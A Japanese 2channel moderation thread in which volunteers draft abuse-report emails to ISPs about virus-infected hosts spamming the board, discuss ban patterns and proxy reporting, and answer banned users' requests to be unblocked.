貴社におかれましては、該当するユーザー様から二度と同様の行為が行われないよう、
該当ユーザー様へ感染事実の告知、ウイルス駆除などの対応をお願いしたく存じます。
また、このメール及び、貴社よりの返信等、事態の経過に関しては、当掲示板サイトにて
公表させていただく場合があります。あしからずご了承ください。
※既に同内容のメールを受信されていた場合、こちらの手違いですのでお手数ですが
当メールは削除してください。
※当掲示板からの正式な通報には、CC欄に
[email protected]が追記されていますので
御確認願います。
※返答には必ずCCに
[email protected]を付けて下さるようにお願いします。
これが無い場合は正式な返答とは認めませんのでご了承下さい。
2ちゃんねる掲示板
http://www.2ch.net/ [email protected] 規制報告担当:(hoge)
[email protected] >>700 いや、それは後半に
>以下が時間およびIPアドレス,リモートホスト一覧のログとなりますので御参照ください。
>(klistのログ)
と書いてるんで先に出すか後に出すかですかね
私はとりあえず要件を伝えてから資料といった感じです
>貴社におかれましては、該当するユーザー様から二度と同様の行為が行われないよう、
これは好きでウイルス感染したんじゃないだろうし、とかw
>>703 ふむ、巻き添えのひとはともかく、感染者本人さんは好きかどうかは別にして
自己責任で感染したんだと思ってましたが。。
702のは、あってもなくてもいいかもですね。
書き込みログ・リモホ開示ログとかがないので、そこを埋めるつもりでちょっと置いてみたので。
あとはですね
プロバイダに協力してもらうといったニュアンスじゃないかと
ウイルスは2chのみ攻撃対象が多いんじゃないですかね
ネット中のサイトを無差別というなら分かりますが
やはり2chをピンポイントで攻撃するなら
「当サイトでは規制を続行しても良いんですが、おたくのユーザーからこんな要請来てるんで
協力してもらえないですか?」
って話かと
>>705 それはどの規制も一緒なんじゃあ…
うーん、701とかがダメダメなら、無かったことにしてください。
あ〜そうか
他の規制とも同じかなぁ
書き込み内容の提示が難しいから下手な文書いちゃったのかなぁ
いかいかん
どうしても自分が書いたのが絡むとダメね
後は任せた |彡サッ
えっ
じゃあ
>>701とかどうですかー(^_^;)>報告する方
送って反応を待てば問題ないと思います。
ただ、説明用のURLって、、、まさかBBSPINK持ってくるんです?
このウイルスは
(ウイルスの説明・どっかのURL引用して説明すれば良いと思われ)
を
該当するウィルスに関しては以下の記事等を参照してください。
http://life.45.kg/sec/ http://life.45.kg/sec/m_cchaos.html に差し替えて見て頂きましょうか、ISPさんに。
あと、ウイルス情報URLなんですが、
【DSBL】PROXY規制中!【報告無用】43
http://qb5.2ch.net/test/read.cgi/sec2chd/1156495663/ のmeshの彼の書込みを使っても大丈夫でしょうか?
>>713 リンクだけじゃなくて、文章でも少し説明がほしいところかも。
(仮)カオスコピーの場合だと
>このウイルスは、Winnyで特定のファイルをダウンロードすることにより感染し、
>感染後当掲示板の複数のスレッドに対し連続投稿を行います。
>詳しくは以下の記事を(ry
とか、とか。
それ頂きます。
これで行こうかと思います。
このウイルスは、Winnyで特定のファイルをダウンロードすることにより感染し、
感染後当掲示板の複数のスレッドに対し連続投稿を行う、スレッドを立てる等の行為を行います。
詳しくは以下の記事を記事等を参照してください。
http://life.45.kg/sec/ http://life.45.kg/sec/m_cchaos.html ウィルス情報URLですが
■ウィルス爆撃相談所&焼き処4【RockBBQ】
http://qb5.2ch.net/test/read.cgi/sec2chd/1147466895/ の方が良いような気がしてきましたが如何なものでしょう?
|_・)
規制情報に上げる必要はない?
必要になったらよんでくださいな。
了解です。
正規表現は
FL**\.***.mesh.ad.jp
で問題無いですかね?
>>718 FL*\.*\.mesh.ad.jp
じゃ?
えーと、基本的に広島だけですー。
直してないんですがー、範囲焼きに東京入ってたと
思いますがー、あれは誤記ですー(すみませんー)。
大分固まったようなんで・・
>>715 >■ウィルス爆撃相談所&焼き処4【RockBBQ】
は規制情報とした方が分かりやすそうな気がします
大元が決まったならテンプレは出す人がそれぞれ手を加えれば良いと思うんで
プロバイダからの連絡メール先はsecurityなのかとか
誰がそのメールを確認して →解除
なのかとか流れを決めたほうが良いと思われ
ちなみに焼きのメモではFLA1A*.hrs.mesh.ad.jpってなってます
まあ、まずは通報をどのようにして開始するのか
という事の方が重要だと思ったりしてますが。
通常のホスト規制みたいにスレに上がったら全部やるのかとか
それとも規制された人から一度報告してもらってから「管理者より」の扱いの物だけ扱うのか、と
まずは
>規制された人から一度報告してもらってから「管理者より」の扱いの物だけ扱う
だけにしないと、しょっぱなだしいきなり回んなくなるかもですよ。
報告人さんが増えれば全部でも大丈夫になるかもですが。
>>724 焼きのホスト指定の仕方が分からなかったんで
一応草案では
通常のホスト規制(規制情報板に上がっている)の表現を入れました。
混乱させてすいません。
焼きでは表現が違うなら、「お願いします〜→焼きました〜」
で使ってる表現で一度やってみて、ダメなら正規表現にして送ってみれば良いのではないかと思います。
多分正規表現にする必要はなしで受け付けてもらえると予想しますが。
おおざっぱな話
*.hrs.mesh.ad.jpでもklistのログ付けるんで、特定には問題ないと思ったり
>>723 爆撃相談&焼きスレのアドレスを
meshの規制情報に上げて頂ければ問題無いみたいですね。
という訳で、
>>717 rukhさん、お願いします。
>>724 了解です。書き換えました。
上がり次第本部で宣言いたします。
>>729 それもですね
宣言は混乱するんで本部でやるのかとか話詰めた方が良いと思いますけど。
もうプロバイダの受付は閉まってますしなにもそんなに慌てなくても、良いんじゃないでしょうか
>>730 >上がり次第本部で宣言
って書いてある(^_^;)
FLA1A*.hrs.mesh.ad.jp を全サーバで規制。
ウイルス感染したホストからと思われる過剰アクセス
による2ちゃんねるに対する迷惑行為。
アクセス記録については以下をご参照下さい。
http://halcyan.30.kg/klist/list.php?filepattern=-106-8-&kwd_sv=comic6&kwd_host=hrs.mesh.ad.jp comic6.2ch.net 2006/08/24(木) 20:36:58 FLA1Aaf059.hrs.mesh.ad.jp
comic6.2ch.net 2006/08/24(木) 20:26:58 FLA1Aaf059.hrs.mesh.ad.jp
comic6.2ch.net 2006/08/24(木) 20:25:32 FLA1Aaf059.hrs.mesh.ad.jp
comic6.2ch.net 2006/08/24(木) 20:23:24 FLA1Aaf059.hrs.mesh.ad.jp
comic6.2ch.net 2006/08/24(木) 18:21:09 FLA1Aat013.hrs.mesh.ad.jp
comic6.2ch.net 2006/08/24(木) 18:13:18 FLA1Aat013.hrs.mesh.ad.jp
他多数
ウイルス感染者への連絡などよろしくお願い致します。
------
こんな感じでいいのかしら?
具体的な焼きの範囲は明示した方がよい(表にだしてよい?)のかしら?
>>730 そりゃま、そうですが。
問題ありそうに思いますか?
過去に山田で通報した事はあるみたいですが。
あちゃ。。リロード忘れです。済みません。
>>732 流石に出しちゃまずいかと思うのですが。
>>732 それだと焼かれた人も分かりやすくて良いですね
>>733 いや、だからそう言った事を焼き関係の方とかみんなで話し合った方が良いんじゃないか
と。
klistの情報をそのまま規制情報板に
載せるのは私は少し抵抗があります。
芋堀ログとは全く違う性質のものだと
理解されておられるのでしょうか。
正式に。
>737
はい、、
・実際に投稿された物ではない。(だから過剰アクセスって表現)
・本当に目的の”荒らし行為”であるのか精査できない。
特にRockerさんであればこそ、そういう部分を強く感じられる
のかもですね。
元となるキーワードを知らない側としては、ワードの精度がどうなのか、
hostの精度がどうなのか、それすら分からないです。<klistを選んでて感じました。
ただし、現状少し無理をするならココしか方法が無いかもです。
そして無理をする価値があるとも(少なくとも私個人としては)
”そのまま”ってのが気になるです。手はあるですか?>Rockerの皆さん。
それとも堀りも含めた通常のフローじゃなきゃやっぱりダメでしょうか?
それとも規制情報なしですか。。
すみませんです。m(_ _)m
ご指摘があったのでいまはまだ上げられません。
了解です。
>>741 こちらも了解です。
お気遣い有難う御座います。
規制情報には上げる必要ないんじゃないの
あくまでも代理人指定が要る例外的な通報なんだし
大体証明の根拠はklistしか示せないんだから
代理人でそれを見せて受け付けてもらえなきゃもう打つ手はないし
宣言については
ココで宣言してるんでちゃんとしたメールです、という証明の意味あいなら
管理人の代理人指定を受けてメールを送るんだから証明の必要はないわけで本末転倒だし
出したか分からないから書く程度なら、いくらでもやりようがあるわけで。
特定の材料になるのはklistしかないという前提を踏まえて
メールの中で説明して信頼性を高めてklistで対応してもらうように交渉するのか
通常のホスト規制のように、2ch側のレス等で提示して信頼性を高めるのか
どっち行くのよ
テンプレにしても通常のテンプレのコピペ改変じゃダメだから
書き直しとかの話になったんじゃないの?
>>746 前者がいいと思う。
>>747 今はCzeskaZbrojevkaさんがやってくれる流れ。
>>730 とか代理人じゃなくていいのかとか無視しても
話は進まないと思われ。
ユーザーがメールしてダメなのに外部の人がメールして解除して貰えるとは思えません。
って皆寝ちゃってるか。
じっくり考えて欲しいな、と。
ある意味判例みたいなもんになるでしょうし。
とかやってる間にひろゆきからOKもらいますた。
ま、続きは明日で。
ネカフェからですが書き込めません。どうすればいいですか?
>755
ネカフェは書ければ儲け物。まず書けないと思ったほうがいい。
起きてるなら反応くらいしてもらいたいもんですねぇ…
>>754-755 諦めれ
むーそうですか。orz
前来たときは、書き込みできたんですけどね><
>>757 プロバイダからのメールの受け口はどうするんですか?
@securityとは別を使う
Arafaleさんもsecurityを確認できるようにする
Breffiさんに確認して知らせてもらう
>>760 先月広告荒らしで焼かれてますな。
次からは
【DSBL】PROXY規制中!【報告無用】43
http://qb5.2ch.net/test/read.cgi/sec2chd/1156495663/ でな。
どう考えてもウイルスじゃないだろ?
いつもどおり、securityにCCしてもらえればいいんでないすか?
>>764 そか、今回の件は焼きだから俺が解除できるし
securityも自分が送ったCCだから読む必要なし。
後は文面のテンプレくらいか…
つまり
> Breffiさんに確認して知らせてもらう
ですね。
>>766 ちゃうちゃう。
俺宛に返信、CCにsecurityっすよ。
プロバイダの中にはsecurity宛にしか送らない所が有るけど
とりあえずは代理人指定が必要な数社だけだからそれでいいか
>>768 rafaleさんが作業する事になったのですか?
>>770 そうです。
といっても有っても一ヶ月2件有るかないかだから(ry
おうおう、じゃあ今日から始動なのかな?がんばってくださいです。
また規制情報のような記載の仕方ですが
Rockerさんたちの間で意見が分かれるところなのでしょうが
>>757 ともありますので、妥協点を詰めるなり話し合いをお願いしたいです。
まずは一度上記で通報した方々と同程度の内容でklistンリンクを貼って送ってみてはどうでしょうか
「こうしてくれ」と有ればそれによって変えていけば良いと思いますが
Rockの概要や目的はこの板の多くの
方々が知っておられるでしょうが、
メールや通報を受け取る側はそうではありません。
klistを今後規制の根拠として掲示していくのであれば
必要な、正しい補足や説明をしていただきたいです。
規制情報板のように多くの目に触れる場所なら尚更です。
klistはウィルス感染ホスト開示用にあるわけではない筈です。
話が大きくなっているようなのですが
規制情報に上げる上げないは、プロバイダが要求してきているわけではなく
また、そうしなければならないというわけではないでしょう。
今回通報しようと、いう動きになったのは
ウイルス焼きのテンプレ、またはスレのアドバイス通りの手順でプロバイダに
連絡したが、「管理者よりお願いします」との事で受け付けてもらえなかったというレスが数件重なったからです
そしてrafaleさんが代理人に追加されるまで
代理人として動いてきたreffiさんが「規制情報に上がらなければ私は通報しない」
といっただけの話で
規制情報に上げる上げないは、reffiさんの方針の話でしか無いと思います。
「管理者から」と連絡があった→reffiさんは自分の方針で動かないと言った
→じゃあ、誰が連絡するの?→rafaleさんがこっち方面の担当代理人となった
当面の問題はこの件を受け持つ代理人が居なかった、というだけの話ですんで
rafaleさんが任命された事により、クリアしたと思います。
プロバイダからの連絡の「管理者からお願いします」との条件はクリアしているわけですので
プロバイダが「管理者から」と言った意図が
・状況が分かりにくいので詳しい説明が出来る管理側の人間をだせ
・今後も同様のことがあった場合の対応方法を確立したいので管理側を出せ
なのか分かりませんが、上レスで既におおよその通報メールのテンプレは固まっているので
とりあえずrafaleさんから通報してみれば良いのではないのでしょうか。
プロバイダが悪戯等を考慮して「管理者側を出せ」と言っているならば
代理人指定を受けたrafaleさんが連絡するだけでおkのはずですし、
また資料の信頼性が乏しいとの事ならば
やり取りの中でrafaleさんにプロバイダと話し合ってもらって、
その上で規制情報に挙げる等の手段を確立していけばいいのではないかと思います。
実際に管理者代理ではなく、一般ユーザーからの連絡でも
klistだけで対応してくれる所がほとんどなので、今回の件がイレギュラーというだけの話だと思います。
過去スレで実際に対応してもらった報告は有りますしね。
「管理者を出せ」というプロバイダがイレギュラーという事で。
あ、ひろゆきとか焼きの方規制の方々が
「今後焼き関係も、要請が有った無しに関わらず
通常規制のように積極的にプロバイダに通報する」
というのなら上でSweetRock ★さんが仰られている通り、
手段を確立しなければならないとは思います。
>>781 昨日、質雑で皆さんが仰られてたのはそれでしょう?
私達、目先だけで動いてるんではないんですよ?
うん?
・BBQ等で範囲焼きをせざる終えない状況のとき(つまり今だとウイルス焼きすね)
・かつISPさんが管理人か代理人からの連絡しか受け付けないと言ってきたとき
にらふぁーるさん部隊が動くんだと思ってたですが。。
マジですか
要請ある無しに関わらずですか
何処の質雑の流れなのか分かりませんが、見落としてましたすいません
それじゃ、一人じゃ絶対足りないでしょう(´Д`;)
>>783 私もそう思ってましたが、将来的には今の通常規制のようにする方向みたいです。
どっか別で話し合われてたみたいですね。(´Д`;)
なんか最近の2chは恐ろしく親切だなぁ
すいません、何か変な書き込みがあったのでコピーして試しに貼り付けてみたのですが、
これってひょっとしてウイルスですか?あまり考えずに近く似合ったものをやってみたんですが・・どうも
すいません
http://money4.2ch.net/test/read.cgi/recruit/1148531128/669 あー、私ゃ言葉足らずみたいで申し訳ないです。
>>783で話の流れはあってると思います。
ただ、一時的な話ではなく、今後の事もある訳で(前例が出来る訳ですから)
SweetRock ★さんが気にしてられるのだと思う訳ですし。
klist提示による証明が一般に表面化するデメリットが大きいのではないかと。
で、『klistを今後規制の根拠として掲示していくのであれば
必要な、正しい補足や説明をしていただきたいです。』と仰ってるのではないでしょうか?
>>785 あの。
『山田ウィルス』の案件でのテンプレは残ってる訳です。
動けない範囲ではないのですよ。
ネックになってたのは『代理人指定』
ネックとして残ってるのは『イレギュラーな通報形態』
宣言に拘ってるのは基本テンプレの
『※なおメールの作成を宣言したURLが書かれていない場合、
当掲示板からの正式な通報メールではありません。』
の一文。
抜かしたら今後報告作業自体がグダグダになりますよ、多分。
詐称通報対策は残す必要があります。
>>786 ノートントラップ。
直の害は無いですが、止めましょうね、マナーとして。
>>786 よくあるスクリプトです
NGでLOVE-LETTER-FOR-YOUでもしてください
コピペして回るのは止めましょう
あと質問スレで
>『※なおメールの作成を宣言したURLが書かれていない場合、
>当掲示板からの正式な通報メールではありません。』
今の件は代理人が送るんですが、意味分かってますかね?
これは一般の通報でも信頼性を持たせるために付けてる文だと思うんですけど。
ですからこの文は元々つける必要は無いわけで。
何かいつもちょっとずれてるような気がするんですが・・
代理人指定が必要無いプロバイダに対しての通報
を考えてるんじゃなく
今は代理人指定が必要なプロバイダに代理人が報告する
という事のを優先してその方策を話し合ってると思ってたんですが。
代理人指定が必要無いプロバイダに対しての通報に関しては
焼かれて困ってる人達が自分達で動いて解除されてるわけで。
普通の人が出したklistじゃプロバイダは受け付けないとか
そういう事例の場合でもrafaleさんにでてって貰って良いと思いますけど。
代理人指定が必要無いプロバイダに対しての通報も積極的に行う
という事を優先・一緒に今話し合う必要があるとは思えませんが。
先走りし過ぎじゃないですか
>>787 >>783であってるですか、良かったです。
んじゃこれからしたほうがいいことは
・klistを規制情報に挙げるか否か
・挙げるとしたらうまい補足説明を考えよう
ってところすかね。
宣言はあったほうがいいと思うですよ。
これからもずっとらふぁーるさん一人でやってくとは限らんわけですし。
宣言するとしたらCzeskaZbrojevkaさんが
>>729でやろうとしていたように
本部でやったらいいと思います。
(頻度を考えると新スレ立てても落ちそう・ここでやると他のレスに埋もれそう)
>>795 代理人指定というのが良く分からないんですが
これは「疑うんならメールをひろゆき宛に送って確認しろ」
じゃなくて「疑うんならココ見ろ(宣言)」
程度のものなんでしょうか?
>>795 早い話、2chの規制情報とか知らない人にとっては
vipの何処で宣言しようと分からないわけですよね?
単に変なトコで宣言して
『※なおメールの作成を宣言したURLが書かれていない場合、
当掲示板からの正式な通報メールではありません。』
付けりゃ良いだけで、管理者の代理人という事の確認はすんでしまうんですか?
klistって規制情報板に上げるような情報かなー。
繋ぎ替えが多いホストを範囲焼きにしてるんであってー、
それが時間で追えるから、ユーザー特定に使える筈だとゆー事で
参考データとして見て下さいって話だと思うんですけどー。
別にメールに書いてあるだけでいいんじゃないですかねー。
それじゃ被害状況判らないってゆーなら、その都度説明すれば
いいんじゃないですかねー。
そんなに件数ないんですからー。
代理人として通知されているなら宣言が無くても
もう代理人として認知されているわけですから
「正式なメールです」云々は前提の話のはずだと思うんですが。
>796
代理人指定になってしまった原因は、
通報者以外からの詐称通報が原因で、プロバイダサイドから管理人本人又は
管理人が指定した通報者以外からの通報は一切受け付けませんよと要求されてきて
現在に至っていると記憶しています。
>>798 私も同じような考えで上で長文をダラダラ書いたんですが・・
>>796 代理人指定はその名のとおり、
「この人はおいらの代理人なので、おいらが連絡したときと同等の対応してくださいー」
と管理人さんが特定の人を代理人として指名するシステムじゃないかと。
重複投稿を防止する意味もある宣言、詐称通報対策で追記された
「宣言がないと正式な云々」は別物っす。
>>800 では代理人として送るメールに
正式なメールでは有りません、云々は必要なんですか?
今話し合ってる件については通常規制の報告ような
宣言なんて要らないと思うんですが。
>803
その一文は今回のケースでは要らないと思います。
書いちゃいますと却って混乱するのではないでしょうか。
どうも
代理人指定が必要無いプロバイダに対しての通報
をごっちゃにしてしまってる人がややこしくしてるような・・
これは問題が山ほどあるので
次の段階の話で優先しなくても良いと思うんですが。
うーん。
性質の違うものを、無理矢理書式を合わせようとしてー、
無理が出てる気がするんですがー。
共通してるのは「代理人指定が要る」ってだけですよねー?
それ以外は、報告人さんの書式に倣う必要って、
何もない気がするんですがー。
代理人になった人が、頑張って説明してくれればいいだけでー。
>>804 そのつもりで話し合いがあまり進展しないようなんで
>>777-781を経緯とともに書いたんですが
かなり経験を詰まれた方の意見を聞きたいのですが。
>>807 要約してみたらいいんじゃないですかねー。
ダラダラと書いてあると、読み飛ばされるかもー。
どの部分を確認したいとかー。
>>806 ですよね。
通常規制の報告コピペ改変を貼られた時からこうなりそうな気はしてたんですが・・
焼きの元締めとしてでも一員としてでも良いので
>>777-781について意見欲しいんですが。
特に
>>781です
>>808 私の裁量ではこれ以上要約できません(´Д`;)
出来ても数行かと。
全く知らない人が読んでも分かるんじゃないかなぁ、と思ったんですが。
まーかいつまんでしまうとー、
「管理人さんから送って下さい」って言われただけでー、
内容が判らないとも書式が不備とも言われてないんですよねー。
だから判りやすく説明した内容を、代理人さんが再送すれば
それだけの話って事じゃないかなーと。
>811
一部のプロバイダさんは、恐らくそうではないかしらと思います。
klist以上を要求されても説明以外は出来ないでしょうしね
ウィルスチェックをしてくださいますようにklist記載のユーザーさんに
プロバイダさんから要請していただけますか?でもいけそうなきもします・・・。
詳細を要求されてきましたら、システムBBQとかRockの仕組みを
簡単に説明しないといけない場合もありますけどね。
まー、それは聞かれたら判るまで説明して下さいって事でー。
駆除したウイルスがわからない場合はどうしたらいいですか?
昨日ノートンでチェックしたんだけど確認してなくて
聞かれたら説明するですよ。
石焼きの中の人やった経験が役に立てるかと。
ただ、ちょっと気になる点がねぇ…
気になる点はどっかで言うなり管理人に聞くなりしないと
何時までも気になったまま先に進まないわけで
通報するときの名前の問題かな?
そんな些細なことではないか。。
>>810 要約してみたー。変な点は修正してして。
◇今回の通報に向けての動きは『ウイルス焼きスレ』でのテンプレ、アドバイスに沿った手順により
ユーザーさん側から連絡するも「管理者よりお願いします」と拒否の返答が帰ってきた件が発端
◇規制情報に上げる如何は、今回のプロバイダ側要求事項では無いので必然性は感じられない
reffiさんが「規制情報に上がらなければ私は通報しない」といっただけの話で
規制情報に上げる如何は、reffiさんの方針の話でしか無いと思う。
◇当面の問題はこの件を受け持つ代理人が居なかった、というだけの話なので
rafaleさんが任命された事により、クリアしたと思う。
(「管理者から」と連絡があった事に対しreffiさんは自分の方針で動かれない旨を申し出。
本件の問題解消の為rafaleさんがこっち方面の担当代理人として動く事になった)
◇上記の状況により
プロバイダが「管理者から」と言った意図が
・状況が分かりにくいので詳しい説明が出来る管理側の人間をだせ
・今後も同様のことがあった場合の対応方法を確立したいので管理側を出せ
なのか分からないが、上レスで、おおよその通報メールのテンプレは固まっているので
とりあえずrafaleさんから通報してみれば良いのではないか。
プロバイダが悪戯等を考慮して「管理者側を出せ」と言っているならば
代理人指定を受けたrafaleさんが連絡するだけでOkの筈。
また資料の信頼性が乏しいとの事ならばrafaleさんとプロバイダとの話し合いの中で
規制情報に挙げる等の手段を確立していけばいいのではないかと思う。
◇実際に管理者代理ではなく、一般ユーザーからの連絡でもklistだけで
対応してくれる所が殆どであり、今回の件がイレギュラーというだけ。
過去スレにおいて実際に対応してもらった報告は有る。
※「管理者を出せ」というプロバイダがイレギュラーという事で。
◇ひろゆきとか焼きの方規制の方々が
「今後焼き関係も、要請が有った無しに関わらず通常規制のように積極的にプロバイダに通報する」
というのならば
>>776でSweetRock ★さんが仰られている通り、
手段を確立しなければならないとは思う。
-- BBQ --
59.136.132.241 -> Roasted(-_-)
以下ノートンでスキャンして駆除したウイルスです
VBS.Freelink.B
Unix.Penguin
Macro.src
Bloodhound.Exploit.6
以上
規制解除お願いします
お疲れ様です。m(_ _)m
形の合わないものを無理やりってのは、今回双方にあるかなぁと
思ったです。
両方提示すればって言葉もあるですし、お返事が芳しくなければ、
一時的に解除して頂いて、書き込み収集後に通常ルートに乗せれば
よいのかなぁと。
>824 えと、削除要請板荒らしで焼かれてるみたいですね。。
よく理解できていないのでどうすればいいか分からないです。
とりあえず繋ぎ変えというのをした方がいいでしょうか?
見事に足並み揃いませんなぁ…
>SNOWさん
お。お。お。
>>828 固定IPは繋ぎ変えてもIP変わらんでしょう。巻き添え出ないんで永久規制。
>>826 お疲れ様です。
Rock外す云々については質雑前スレで犬サンが言及されてます。
http://qb5.2ch.net/test/read.cgi/sec2chd/1156481591/800-804 > 800 名前:(^-^)犬 ◆VET4349ZB. [sage] 投稿日:2006/09/05(火) 09:52:27 ID:XwfgKrBA0
> Rock登録外してよかですか?
> 802 名前:名無しの報告[sage] 投稿日:2006/09/05(火) 09:59:27 ID:/+U+2sju0
>
>>800 > 外した後のビジョンが固まってからおながいします。。
> なにもなしに外すと爆撃対象板のほうが大混乱になるかと。
> 804 名前:(^-^)犬 ◆VET4349ZB. [sage] 投稿日:2006/09/05(火) 10:00:51 ID:XwfgKrBA0
> あぁ、既に規制されているのだから今外してもダメか。
通常のログに乗せられるのでしたらこの辺りのクリアー宜しくです。
>>829 …あの。
rafaleさんが纏めないで誰が纏めるんですか?
動いてちょ。
俺が代理人としてメールする
それ以上に何かありますか?
皆さん杞憂のしすぎかと。
>>830 永久規制?
こっちは何もしてないのにこれからずっと書き込めないって言うんですか?
>>833 要請板に「規制うぜえ」なんて書くわウィルスに感染するわ
最悪な方ですねw
バイバイーノシ
>>834 これですか
どうにかできないのでしょうか?
いつか解除されるとかどうこうすれば解除してもらえるとか
三択です。
1. 諦める
2. 諦める
3. 諦める
>>836 >>830 書きたかったら●でも買うしかないか。
>>837 おもしろいですね
>>838 アドバイスありがとうございます
おとなしくプロバイダ変えてきます
そしてまた同じような事をやって規制
それが馬鹿スパイラルヽ(´ー`)ノ
馬鹿が全員同じような性格をしていると思ってる馬鹿もいるんですね
というか「馬鹿なことをやった」から規制されたんじゃないか。
いわば「十把一絡げ」扱いされて当然の馬鹿だな。
>>826 無意味なので解除は無しでー。
今のキーワードは、全く巻き添えはありませんしー。
いまも毎日20ホストくらい焼いてる状態ですー。
範囲焼きを幾つかしてある状態でもそんな感じでー。
表面化してないだけでー、裏では相当な量の
ウイルス投稿があるんですよねー。
ここでklistで示してるところなんて氷山の一角ですよー。
この前、試しに解除してみたことがありますがー、
一気に押し寄せるように埋め立て始めたので10分で戻しましたー。
まずklistの情報で特定してみて下さいとお願いするのが得策ですー。
もしそれで駄目なプロバイダがあるなら、その時個別に考えるだけですー。
そんなら一先ずらふぁーるさんの報告とその返答待ちすかね。
正座してまっとこ。うまくいきますようにー。
>もしそれで駄目なプロバイダがあるなら
その時の杞憂なお話だったり、meshには2度ほど
泣かされた記憶があるので。(3度だったかなぁ)
サンプル取るだけなので、焼きのみ10分程度でいいみたいですが、
今回は探せば大丈夫そうなので、もしもの時でも必要ないかもですね。
#アレだとおもったら容赦なく止めてくださいな。
>845
乙ですー。
なんで書き込み禁止されているんでしょう?
ここに書き込めばわかるんですか?
>>854 なんと!
ということは暫くは絶望的ですか…
>>16のやり方でやったら出来るのかな?
御教授頂き、ありがとうございました。
今度からは出来るだけ前のレスも読み返すよう努力します…
いや、何もないのが一番いいのですが。シクシク。
>>854 教えて頂いた
【DSBL】PROXY規制中!【報告無用】43
の
>>16の通り、セキュリティを切ったら書き込めました。
ただし、流石にこのままでは怖いので、新しく併用できるソフトを
入れようと思います。重ね重ねありがとうございました。
現時点ではまだ返答来てません。
次のチェックは夕方〜
>>858 管理人がまだパロパに指定メール出してないんじゃないのw?
確認した方がいいよ。
何もしてないと思われてるのかw
ところでまだ範囲焼きされてるとこあるはずなんだが
マナーがいいのか気づいてないのか困ってないのかどうなんだ?
やっぱひろゆきメールに気付いてなかったw
来週前半には解除出来るかも。
odn、今日は10回くらい繋ぎ直してやっと書き込めたら、IDがodnから始まって
いてビビったよ。
これでよろしいのでしょうか?
-- BBQ --
211.1.193.49 -> Roasted(-_-)
NOTON INTERNET SECURITY 2006
バージョン9.1.0.33
VBS.Freelink.B
Bloodhound.Exploit.6
VBS.Internal
MHTMLRedir.Exploit
VBS.LoveLetter.A
WScript.KakWorm
Adware.Savenow
Trojan.Dropper
ウィルスを全て駆除しました。
解除お願いできますでしょうか?
>>869 回答まことにありがとうございました。
他の方がウイルスに感染している可能性が在りそのため2ちゃんねるで規制されていること
を伝えるは私でも分かるのですが…大変申し訳ないのですが下のURLはどういう意味なんでしょうか?
>>870 プロバイダさんへご連絡いただく際に下のURLを添えていただけると
「何時何分何秒にアクセスしていた人」ということでどのユーザーさんが感染しているか
プロバイダさんの方で特定できるのではないかと
そういう感じです
>>871 早い回答、真にありがとうございます。大変助かりました。
それではそのみねを連絡しておきます。
それからこれからも頑張って下さい。
それでは失礼させていただきます。
>>872 ちなみに感染しているのはこのあたりのウイルスと思われますので
それも教えてあげてください
http://life.45.kg/sec/for_doujin.html >>873 分かりました。そちらのURLも添付させていただきます。
それから度重なる質問で恐縮なのですが…。
>プロバイダさんからのお返事の内容を確認して
とは私からプロパイダさんのお返事を貰った後に
このスレに報告させて頂ければよろしいのでしょうか?
それともプロパイダさんから2chへ報告するのでしょうか?
まことにご面倒でしょうが回答お願いいたします。
>>874 あなたがいただいたメールを可能な範囲でコピペでもしてもらえれば
それでOKですよ
>>875 了解いたしました。それではまたご報告に着させていただきますので
その時になりましたらどうかよろしくお願いいたします。
色々とありがとうございました。それでは失礼いたしました。
指導して貰いましてウイルス駆除しましたが解除要請はこちらでしょうか?よろしくです
どっちでもいいんですけど
テンプレを全然読んでないようなので駆除は無理です
先日、相談させてもらった者なのですが…プロパイダさんからお返事が来たので
ご報告しに参りました。
>お返事が遅くなりまして誠に申し訳ございません。
>お問い合わせの件でございますが、該当ユーザー様への警告などの
>ご対応をさせていただきます。
>その際、2ちゃんねる管理人様からのご連絡が必要となります。
>誠にお手数ではございますが、一度管理人様まで
>ご連絡をしていただければ幸いに存じます。
このような内容なのですがどうしたらよいのでしょうか?
真にご面倒だと思いますがご解答宜しくお願いいたします。
んでも割と出来るだけの情報を提供した結果が
>>882ぽいね。
あいあい。
送ったメールの内容をここに書いてもらえると助かります。
あと、meshから対応のメールが来たんで一旦解除します。
フラグ立てとくんで再発したら再利用してくださ>焼きの方々
>>890 私の送ったメールをここに書けばよろしいのでしょうか??
>>891 いや、そうは書いてないけど、転載いる?
>>892 おねげーしま。
>>893 まあできるかぎり晒した方がいいんではないかと
>>893 分かりました。それでは二通送りましたので二通とも書かせていただきます。
>2chで規制されているのですが他の方がウイルスに感染している可能性があるため
>規制されているようなので報告させていただきました。
>下記のURLを添付することでどのユーザーさんが感染しているかプロバイダさんの方で特定できるそうなの
>添付させていただきました。
>
http://halcyan.30.kg/klist/list.php?filepattern=106-9-&kwd_sv=&kwd_host=phoenix.aitai.ne.jp >早期の対応を宜しくお願いいたします。
>先ほど2chんぼ規制についてメールさせてもらったものですが度重なるメールで恐縮なのですが
>感染しているのはこのあたりのウイルスだとのことです。参考になればよろしいのですが。
>
http://life.45.kg/sec/for_doujin.html >それではどうか宜しくお願いいたします。
>>898 遅くなって申し訳ない。
範囲焼き、個別焼きとも hrs.mesh.ad.jp は解除しました。
tkyも範囲焼きされてるんだねぇ…
んじゃまずmeshの返答転載する〜
西村様
お問い合わせありがとうございます。
BIGLOBEカスタマーサポート○○と申します。
2006/09/09 00:40:49 頃ご連絡いただきました件につきまして、回答させて
いただきます。
お問い合わせいただきましたウイルスによる連続投稿の件につきましては、
ご連絡いただきましたログ情報等より、投稿したと思われるBIGLOBEサ
ービス会員が特定されました。
弊社会員の連続投稿によってお客様にご迷惑をおかけしておりまして、誠に
恐縮ではございますが、当該会員に対しましては、ウイルスによる連続投稿が
行われていることを伝え、至急ウイルスの駆除などの処置を行うよう指示いた
しました。
ウイルス駆除の実施につきましては、当該会員の状況によっても異なります
が、若干の時間を要する場合もあるかと思われます。
大変恐れ入りますが、1週間程度様子をみていただき、なお同様の連続投稿
が行われるとのことでしたら、改めて新しく投稿されたログ情報等をご連絡い
ただければ幸いでございます。
再度同一のBIGLOBEサービス会員より投稿が行われていることの確認
が取れた場合には、大至急状況を改善するよう警告を発し、あるいは改善が行
われるまで接続を停止するなどして、連続投稿が行われなくなるよう対応させ
ていただきたいと考えておりますので、何卒ご理解の程よろしくお願い申し上
げます。
また、代理人の件につきましては、ご連絡いただきましてありがとうござい
ました。
今後は、○○様からご連絡いただきました際にも鋭意対応させていただきま
す。今後ともよろしくお願いいたします。
>>900 この一番上の西村様ってひろゆきのことね。
俺の名前じゃないんであしからずw
今からaitaiにメール書きます。
>900
